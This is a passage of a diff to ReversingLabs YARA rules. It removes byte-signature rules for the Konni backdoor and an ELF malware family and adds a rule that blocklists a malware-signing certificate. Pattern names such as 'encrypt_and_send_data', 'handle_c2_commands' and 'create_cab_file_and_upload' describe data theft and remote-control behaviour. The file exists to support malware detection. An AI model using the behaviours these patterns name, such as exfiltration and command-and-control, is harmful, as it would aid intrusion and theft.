-            ?? 44 8B 64 24 ?? 4D 6B E4 ?? 4C 03 64 24 ?? 49 8D 7C 24 ?? 83 7C 24 ?? ?? BA ?? ??
-            ?? ?? 0F 4E 54 24 ?? 48 63 D2 8B 74 24 ?? 48 8D 44 24 ?? 48 8D 34 30 E8
-        }
-		$decrypt_configuration_p2 = {
-            0F B7 54 24 ?? 66 41 89 54 24 ?? 83 44 24 ?? ?? 83 7C 24 ?? ?? 77 ?? 89 6C 24 ?? 41
-            BC ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 48 8D 7B ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 66 89 44 24 ?? 44 89 64 24 ?? EB ?? 41 83 C4 ?? 83 C5 ?? 48 83 C3 ?? 4C 89 F1
-            4C 89 FF B8 ?? ?? ?? ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 89 D8 4C 29 E8 48 39 C8 0F 82
-            ?? ?? ?? ?? 8B 4C 24 ?? 48 8B 54 24 ?? 89 8A ?? ?? ?? ?? 48 8D 5C 24 ?? B9 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? 48 89 DF F3 48 AB 48 8B 7C 24 ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7
-            D1 48 8D 51 ?? 48 8B 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 44
-            24 ?? C6 80 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 54 24 ?? C6 82 ?? ?? ?? ?? ??
-            80 7C 24 ?? ?? 75 ?? 48 8B 4C 24 ?? C6 81 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B
-            44 24 ?? C6 80 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 54 24 ?? C6 82 ?? ?? ?? ??
-            ?? 80 7C 24 ?? ?? 75 ?? 48 8B 4C 24 ?? C6 81 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48
-            8B 44 24 ?? C6 80 ?? ?? ?? ?? ?? 48 8D 5C 24 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89
-            DF F3 48 AB 48 8B 7C 24 ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 81 F9
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 46 D1 48 8B 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? C6 44
-            24 ?? ?? C6 44 24 ?? ?? 48 8D 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ??
-            ?? ?? 48 8D 7C 24 ?? B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 83 E9 ?? 8D
-        }
-		$decrypt_configuration_p3 = {
-            41 ?? 48 98 80 7C 04 ?? ?? 74 ?? 48 63 C1 C6 44 04 ?? ?? 83 C1 ?? 48 63 C9 C6 44 0C
-            ?? ?? 4C 89 EB BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 49 C7
-            C4 ?? ?? ?? ?? 4C 8D 74 24 ?? 41 BF ?? ?? ?? ?? EB ?? 0F B6 03 3C ?? 75 ?? 8B 7C 24
-            ?? 48 8D 54 24 ?? 48 8D 3C 3A BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24
-            ?? 48 81 C2 ?? ?? ?? ?? 48 8B 4C 24 ?? 66 89 44 91 ?? 0F B7 44 24 ?? 66 89 44 91 ??
-            83 44 24 ?? ?? 83 7C 24 ?? ?? 77 ?? 89 6C 24 ?? EB ?? 3C ?? 75 ?? 48 8D 7B ?? BA ??
-            ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 44 24 ?? 83 C5 ?? 48 83 C3 ?? 4C 89 E1
-            4C 89 F7 44 89 F8 F2 AE 48 F7 D1 48 83 E9 ?? 48 89 D8 4C 29 E8 48 39 C8 0F 82 ?? ??
-            ?? ?? 8B 4C 24 ?? 48 8B 54 24 ?? 89 8A ?? ?? ?? ?? EB ?? 48 8B 44 24 ?? C7 80 ?? ??
-            ?? ?? ?? ?? ?? ?? 48 8B 7C 24 ?? 48 83 C7 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 C0 BA ?? ?? ?? ?? 0F 4E C2 48 8B 54 24 ?? 89 82 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            EB ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
-        }
-		$encrypt_and_send_data = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 4C 89 74 24 ?? 4C 89 7C
-            24 ?? 48 83 EC ?? 41 89 FC 48 89 F5 49 89 D6 41 89 CD 48 85 F6 0F 84 ?? ?? ?? ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 89 03
-            0F B6 45 ?? 88 43 ?? 8B 6B ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? BA ??
-            ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 44 89 E9 BA ?? ?? ?? ?? 48 89 DE 44
-            89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? 48
-            89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 ED 74
-            ?? 4D 85 F6 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 4C 63 FD 4C 89 FF E8 ?? ?? ?? ?? 48 89 C3 48 85 C0 74 ?? 4C 89 FA 4C 89
-            F6 48 89 C7 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 EE 48 89 DF E8 ?? ?? ?? ?? 44 89 E9 89
-            EA 48 89 DE 44 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8
-            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 48 8B 3D ?? ?? ?? ?? 48 83
-            C7 ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 48
-            8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 4C 8B 74 24 ?? 4C 8B 7C 24
-            ?? 48 83 C4 ?? C3
-        }
-		$receive_and_decrypt_data = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 48 83 EC ?? 41 89 FC 48
-            89 F3 49 89 D5 89 CD 48 85 F6 74 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ??
-            ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 8B 53 ?? 85 D2 74 ?? 4D 85 ED 75 ??
-            B8 ?? ?? ?? ?? EB ?? 81 FA ?? ?? ?? ?? 77 ?? 89 E9 4C 89 EE 44 89 E7 E8 ?? ?? ?? ??
-            85 C0 74 ?? 8B 73 ?? BA ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8
-            ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ??
-            C3
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( all of ( $change_name_on_system_p* ) ) and ( all of ( $decrypt_configuration_p* ) ) and ( $encrypt_and_send_data ) and ( $receive_and_decrypt_data ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "M-Trans Maciej Caban" and pe.signatures [ i ] . serial == "1c:89:72:16:e5:8e:83:cb:e7:4a:d0:32:84:e1:fb:82" and 1639119705 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Backdoor_Konni : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5A364C4957D93406F76321C2316F42F0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Konni backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6fe230b1-357a-54f7-a9a8-15d0369fec71"
-		date = "2023-12-07"
-		modified = "2023-12-07"
+		id = "49e36ae5-25f0-5e1d-82f0-c7ada2b4d914"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Win32.Backdoor.Konni.yara#L1-L190"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7907a657d804d485718ba13bb23513de0b909e7d455c2b3ee193b5329edd3ac6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10880-L10896"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fe3a2b906debb3f03e6a403829fca02c751754e9a02442a962c66defb84aed83"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Konni"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$network_communication_p1 = {
-            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? 57 33 FF 68 ?? ?? ?? ?? 8D 9E ?? ?? ?? ??
-            57 53 89 7D ?? 89 7D ?? 89 7D ?? 89 7D ?? 89 7D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 45 ??
-            50 56 8D 8E ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
-            81 C6 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 57 57 57 6A ?? 57 FF 15 ?? ?? ?? ?? 8B D8 3B DF
-            0F 84 ?? ?? ?? ?? 57 57 6A ?? 57 57 6A ?? 56 53 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8B F8 89 7D ?? 85 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 8D 47 ?? 5F 5E 5B 8B E5 5D C2 ??
-            ?? 8B 55 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 52 68 ?? ?? ?? ?? 57 C7 45 ?? ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 8B 35 ?? ?? ?? ?? 57 FF D6 53 FF D6 5F
-            5E B8 ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ??
-            6A ?? 6A ?? 85 C0 74 ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 6A ?? 56
-            FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 57 FF D6 53 FF D6 5F 5E B8 ?? ?? ?? ??
-            5B 8B E5 5D C2 ?? ?? 8B 45 ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ??
-            ?? ?? ?? FF D6 57 FF D6 53 FF D6 5F 5E 83 C8 ?? 5B 8B E5 5D C2 ?? ?? 40 50 6A ?? 89
-        }
-		$network_communication_p2 = {
-            45 ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ??
-            ?? ?? ?? FF D6 8B 4D ?? 51 FF D6 53 FF D6 5F 5E 83 C8 ?? 5B 8B E5 5D C2 ?? ?? 8B 55
-            ?? 52 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? 6A ??
-            56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 45 ?? 50 FF D6 53 FF D6 5F 5E 83
-            C8 ?? 5B 8B E5 5D C2 ?? ?? 8B 55 ?? 8D 4D ?? 51 52 57 56 FF 15 ?? ?? ?? ?? 85 C0 74
-            ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 B8 ?? ?? ?? ?? 75 ?? 8B 45 ?? 89 45 ?? 83 F8 ?? 74 ?? 8B 4D ?? 8B 55 ?? 6A ??
-            8D 45 ?? 50 51 57 52 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 01 45 ?? 51 6A ?? 57 E8 ??
-            ?? ?? ?? 8B 45 ?? 83 C4 ?? 8D 55 ?? 52 50 57 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D
-            ?? 51 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ??
-            56 8B 35 ?? ?? ?? ?? FF D6 8B 55 ?? 52 FF D6 53 FF D6 83 7D ?? ?? 0F 84 ?? ?? ?? ??
-            8B 45 ?? 5F 5E 5B 8B E5 5D C2
-        }
-		$handle_c2_commands_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 85 ?? ?? ?? ??
-            50 33 FF 68 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ??
-            3B F7 75 ?? 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 0D ?? ??
-            ?? ?? 8B 16 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
-            4E ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 56 ?? 68 ?? ?? ?? ?? 52 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4E ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B
-            5E ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 46 ?? 52 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4E ?? 57 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 46 ?? 52 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 75 ?? 8B 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 69 C0 ?? ?? ?? ?? A3 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 56 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 85
-        }
-		$handle_c2_commands_p2 = {
-            C0 75 ?? 8B 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 69 C0 ?? ?? ?? ?? A3 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4C 86 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? BE
-            ?? ?? ?? ?? 85 C0 75 ?? 8D 78 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33
-            FF E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 06 52 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
-            44 96 ?? 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 8B 54 8E ?? 68
-            ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 06 8D 50 ?? 8B FF 66 8B 08 83
-            C0 ?? 66 3B CF 75 ?? 2B C2 D1 F8 57 8D 3C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB
-            ?? 8B 06 8D 50 ?? 66 8B 08 83 C0 ?? 66 3B CF 75 ?? 2B C2 D1 F8 6A ?? 8D 3C 45 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? A1 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 54 8E ?? 50
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 48 ?? EB ?? 33 C9 E8 ?? ?? ?? ?? 8B F8 56
-            FF 15 ?? ?? ?? ?? 8B 4D ?? 8B C7 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$create_cab_file_and_upload_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? A1 ?? ?? ?? ?? 53 56 57 33
-            FF 68 ?? ?? ?? ?? 8B F1 8D 95 ?? ?? ?? ?? 33 C9 57 52 89 85 ?? ?? ?? ?? 89 BD ?? ??
-            ?? ?? 89 BD ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 66 89
-            85 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 33 D2 50 66 89 95 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 0F B7 8D ?? ?? ?? ?? 0F B7 95 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 51 0F B7 8D ??
-            ?? ?? ?? 52 0F B7 95 ?? ?? ?? ?? 50 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 57
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 57 68 ?? ?? ?? ?? 8B C8 51 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52
-            FF 15 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B D8 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ??
-            68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ??
-            ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B CE 8D BD ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 F8 ?? 75 ?? 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 57 8D
-        }
-		$create_cab_file_and_upload_p2 = {
-            85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? EB ?? 33 FF 8D 9D ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 74 ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ??
-            ?? 8B B5 ?? ?? ?? ?? 83 C6 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 74
-            ?? 56 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 3B
-            DF 74 ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? EB ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 3B
-            CF 75 ?? 2B C2 8D 93 ?? ?? ?? ?? D1 F8 8D 0C 00 33 C0 89 02 89 42 ?? 89 42 ?? 89 42
-            ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? 3B CF 74 ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8B CB EB ?? 33 C9 8B 95 ?? ?? ?? ?? 89 8A ?? ?? ?? ?? 3B CF 0F 84 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8B
-            BD ?? ?? ?? ?? 8B 87 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 C7 87 ??
-            ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8D 9B ?? ?? ?? ??
-            66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D 84 46 ?? ?? ?? ?? 50 6A ?? 89 85 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ??
-            53 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 50
-            53 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? 51 03 C3 50 E8 ?? ?? ?? ??
-            8B BD ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 FB 83 C4 ?? 03 FE B9 ?? ?? ?? ?? BE ?? ?? ??
-            ?? 50 F3 A5 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 E8
-        }
-		$create_cab_file_and_upload_p3 = {
-            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 57 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B 4D ??
-            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 81 C6 ?? ?? ?? ??
-            6A ?? 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 50 05 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? 56 68 ?? ?? ?? ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8B F0 85 F6 75 ?? 8B 95 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 52 FF D6 57 FF D6 B8 ?? ??
-            ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 50 53 6A
-            ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56
-            8B 35 ?? ?? ?? ?? FF D6 8B 8D ?? ?? ?? ?? 51 FF D6 57 FF D6 B8 ?? ?? ?? ?? 5F 5E 5B
-            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 95 ??
-            ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35
-            ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 50 FF D6 57 FF D6 B8 ?? ?? ?? ?? 5F 5E 5B 8B 4D
-            ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15
-            ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 8D ?? ?? ?? ?? 51 FF D6 57 FF D6 83 C8
-        }
-		$create_cab_file_and_upload_p4 = {
-            5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 40 50 6A ?? 89 85 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ??
-            FF D6 8B 95 ?? ?? ?? ?? 52 FF D6 57 FF D6 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 50 6A ?? 53 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83
-            C4 ?? 8D 8D ?? ?? ?? ?? 51 52 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ??
-            ?? FF D6 8B 85 ?? ?? ?? ?? 50 FF D6 57 FF D6 8B 4D ?? 8B 85 ?? ?? ?? ?? 5F 5E 33 CD
-            5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$cmd_expand_payload = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? 8B
-            D9 33 FF 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 33 D2 57 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D
-            ?? ?? ?? ?? 57 51 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ??
-            57 6A ?? 33 C0 68 ?? ?? ?? ?? 53 89 BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 57 57 57 6A ?? 57 56 FF
-            15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 75 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? 5F 5E 5B
-            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 57 57 57 6A ?? 50 FF 15 ?? ?? ?? ?? 8B F8
-            85 FF 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 47 ?? 50 6A ?? 6A ?? FF 15
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
